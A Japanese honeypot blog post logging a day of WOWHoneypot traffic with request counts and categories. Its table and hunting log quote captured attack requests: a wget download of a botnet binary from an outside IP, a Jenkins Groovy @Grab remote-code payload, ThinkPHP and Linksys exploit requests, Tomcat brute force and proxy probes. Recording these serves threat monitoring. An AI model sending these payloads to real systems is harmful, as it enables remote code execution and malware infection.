23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(78日目)

2019/06/02(日)

トータルは2064件です。

ハンティングログは以下です。

134.209.28[.]200 wget+hxxp[:]//134.209.183.3/akbins/mpsl.akira.ak

www.virustotal.com

件数 概要 リクエス
2003 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
35 アクセス GET /
7 T GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27hxxp://185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;
3 不正中継の調査 CONNECT check.best-proxies.ru:80
2 スキャン GET /systemInfo
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 調査 HEAD /
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.8316224924822162167552
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.56421252011419202352420
1 不正中継の調査 GET hxxp://www.baidu.com/?0.44365944407759142717792
1 不正中継の調査 GET hxxp://www.baidu.com/?0.1548038563222643042551788
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 不正中継の調査 CONNECT www.baidu.com:443
1 不正中継の調査 POST hxxp://check.best-proxies.ru/azenv.php?auth=155948717133277&a=PC&i=2160567056&p=8080
1 不正中継の調査 POST hxxp://check.best-proxies.ru/azenv.php?auth=155947904939395&a=PC&i=2160567056&p=8080
1 不正中継の調査 POST hxxp://check.best-proxies.ru/azenv.php?auth=155946042475455&a=PC&i=2160567056&p=8080
1 不正中継の調査 GET hxxp://www.baidu.com/